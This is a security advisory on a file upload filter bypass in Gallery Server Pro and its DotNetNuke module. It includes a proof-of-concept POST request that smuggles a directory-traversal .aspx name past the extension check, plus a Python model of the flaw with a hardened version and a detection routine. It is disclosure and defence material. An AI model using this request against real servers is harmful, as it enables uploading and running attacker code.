Gallery Server Pro File Upload Filter Bypass

14 May 2013, reported by Drew Calcott. Source: packetstorm (packetstormsecurity.com).

Gallery Server Pro File Upload Filter Bypass. The application is vulnerable to a bypass of its file upload filter restrictions, allowing malicious users to upload arbitrary file types and execute server-side code. Exploitation requires an authenticated account, or a configuration that permits unauthenticated uploads.

 ( , ) (,  
. `.' ) ('. ',  
). , ('. ( ) (  
(_,) .`), ) _ _,  
/ _____/ / _ \ ____ ____ _____  
\____ \==/ /_\ \ _/ ___\/ _ \ / \  
/ \/ | \\ \__( <_> ) Y Y \  
/______ /\___|__ / \___ >____/|__|_| /  
\/ \/ .-. \/ \/:wq  
(x.0)  
'=.|w|.='  
_='`"``=.  
  
presents..  
  
  
Gallery Server Pro File Upload Filter Bypass  
  
Vendor Link: http://www.galleryserverpro.com/  
PDF:  
http://security-assessment.com/files/documents/advisory/GalleryServerProFileUploadFilterBypass.pdf  
  
  
+-----------+  
|Description|  
+-----------+  
  
Gallery Server Pro is a media gallery that works both as a stand-alone  
application and as a module for DotNetNuke. Security-Assessment.com has  
discovered that the upload functionality of both the application and  
DotNetNuke module are vulnerable to bypassing the restrictions present  
in the file upload filter. This permits a malicious authenticated user  
to upload arbitrary file types, including .NET scripts, allowing the  
execution of server side code.  
  
  
+------------+  
|Exploitation|  
+------------+  
  
Exploitation of this vulnerability requires the user to have an  
authenticated account with permission to upload files to a gallery, or  
for the application / module to be configured to allow unauthenticated  
users to upload. By modifying the content of the “name” parameter in the  
POST request to the server, it is possible to bypass the file type  
upload restrictions, which are only applied to the “filename” parameter.  
By then passing directory traversal strings in the “name” parameter, it  
is possible to save the uploaded file within the webroot of the  
application / module.  
  
In the standalone application version of Gallery Server Pro, the IIS  
user does not have permission to write directly to the webroot of the  
application. Therefore, it is necessary to place the file within the  
“gs\mediaobjects\Samples” path as per the example below. Please note  
that the DotNetNuke module does not have these same restrictions by default.  
  
  
+----------------------------------+  
|Proof of Concept HTTP POST Request|  
+----------------------------------+  
  
*********************************************************************  
POST /gallery/gs/handler/upload.ashx?aid=2 HTTP/1.1  
Host: <vulnerablesite>  
Referer:  
http://<vulnerablesite>/gallery/default.aspx?g=task_addobjects&aid=2  
Content-Length: 73459  
Content-Type: multipart/form-data;  
boundary=---------------------------41184676334  
Cookie: <VALID COOKIE DATA>  
Pragma: no-cache  
Cache-Control: no-cache  
  
-----------------------------41184676334  
Content-Disposition: form-data; name="name"  
  
..\..\gs\mediaobjects\Samples\malicious.aspx  
-----------------------------41184676334  
Content-Disposition: form-data; name="file"; filename="malicious.jpg"  
Content-Type: application/octet-stream  
  
Malicious code here.  
  
-----------------------------41184676334--  
*********************************************************************  
  
The uploaded file will then be available on the affected server at:  
http://<vulnerablesite>/gallery/gs/mediaobjects/Samples/malicious.aspx  
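The two defects behind the Exploitation section and the proof-of-concept request above are that the extension allowlist is evaluated against the "filename" parameter while the on-disk name is taken from the separate "name" parameter, and that "name" is joined onto the upload directory without being reduced to a basename or checked for containment. The following Python is an added example, not Gallery Server Pro's code, that models the flawed logic beside a hardened version and adds a detection check over the same fields. The parameter names "name" and "filename" and the extension .aspx come from the advisory; UPLOAD_ROOT, the allowlist and the sample request values are constructed for the example.

```python
"""Hardened handling of multipart upload parameters.

Added example for this advisory; it is not Gallery Server Pro's code. It models
the two defects described in the advisory: the extension filter was applied only
to the "filename" parameter, while the separate "name" parameter chose the
on-disk path and accepted directory traversal. UPLOAD_ROOT, the allowlist and
the sample requests are constructed.
"""
import posixpath

UPLOAD_ROOT = "/inetpub/app/uploads/tmp"                # constructed upload directory
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}  # constructed allowlist
SERVER_SIDE_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".config"}  # ASP.NET-handled types


def _normalize(value: str) -> str:
    """Treat backslashes as separators: IIS accepts both, and clients send either."""
    return value.replace("\\", "/")


def _extension(name: str) -> str:
    return posixpath.splitext(name.lower())[1]


def vulnerable_save_path(name_param: str, filename_param: str) -> str:
    """Model of the flaw in the advisory: the allowlist checks only 'filename',
    and 'name' is joined onto the upload root without basename or containment
    checks, so traversal sequences in 'name' escape the directory."""
    if _extension(filename_param) not in ALLOWED_EXTENSIONS:
        raise ValueError("filename extension not allowed")
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, _normalize(name_param)))


def hardened_save_path(name_param: str, filename_param: str) -> str:
    """Validate the name that will actually be written, then confirm the
    resolved path is a direct child of the upload root."""
    # 1. Only a basename may influence the stored file name; drop any directory part.
    stored = posixpath.basename(_normalize(name_param or filename_param))
    if stored in ("", ".", ".."):
        raise ValueError("empty or reserved file name")
    # 2. Allowlist the final extension of the stored name, not of a different field.
    if _extension(stored) not in ALLOWED_EXTENSIONS:
        raise ValueError("stored extension not allowed: %s" % _extension(stored))
    # 3. Belt and braces: the resolved path must sit directly inside UPLOAD_ROOT.
    final = posixpath.normpath(posixpath.join(UPLOAD_ROOT, stored))
    if posixpath.dirname(final) != posixpath.normpath(UPLOAD_ROOT):
        raise ValueError("path escapes upload root")
    return final


def audit_upload_fields(name_param: str, filename_param: str) -> list:
    """Detection view: reasons a request's upload fields look like a bypass
    attempt. Suitable for running over parsed request logs or in a WAF hook."""
    findings = []
    n = _normalize(name_param)
    if "../" in n or n.startswith("/"):
        findings.append("traversal or absolute path in name")
    if name_param and _extension(n) != _extension(filename_param):
        findings.append("extension of name differs from filename")
    if _extension(n) in SERVER_SIDE_EXTENSIONS:
        findings.append("name carries a server-executable extension")
    return findings


# Constructed sample requests: the advisory's proof-of-concept values and a benign one.
POC_NAME = "..\\..\\gs\\mediaobjects\\Samples\\malicious.aspx"
POC_FILENAME = "malicious.jpg"
BENIGN_NAME, BENIGN_FILENAME = "holiday.jpg", "holiday.jpg"

if __name__ == "__main__":
    print("vulnerable ->", vulnerable_save_path(POC_NAME, POC_FILENAME))
    print("audit ->", audit_upload_fields(POC_NAME, POC_FILENAME))
    try:
        hardened_save_path(POC_NAME, POC_FILENAME)
    except ValueError as exc:
        print("hardened -> rejected:", exc)
    print("hardened benign ->", hardened_save_path(BENIGN_NAME, BENIGN_FILENAME))
```

The hardened path applies the allowlist to the name that is actually written and ignores every directory component a client supplies; a stronger design also generates the stored name server-side and keeps the upload directory outside any location the web server will execute, which is the property the standalone application happened to rely on in the "mediaobjects\Samples" note above.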
  
  
+--------+  
|Solution|  
+--------+  
  
The vendor has released an update for all vulnerable versions of Gallery  
Server Pro and its related DotNetNuke plugin. The patch is available for  
download from the vendor's website at:  
http://www.galleryserverpro.com/download.aspx  
  
  
+-----------------------------+  
|About Security-Assessment.com|  
+-----------------------------+  
  
Security-Assessment.com is Australasia's leading team of Information  
Security consultants specialising in providing high quality Information  
Security services to clients throughout the Asia Pacific region. Our  
clients include some of the largest globally recognised companies in  
areas such as finance, telecommunications, broadcasting, legal and  
government. Our aim is to provide the very best independent advice and a  
high level of technical expertise while creating long and lasting  
professional relationships with our clients.  
  
  
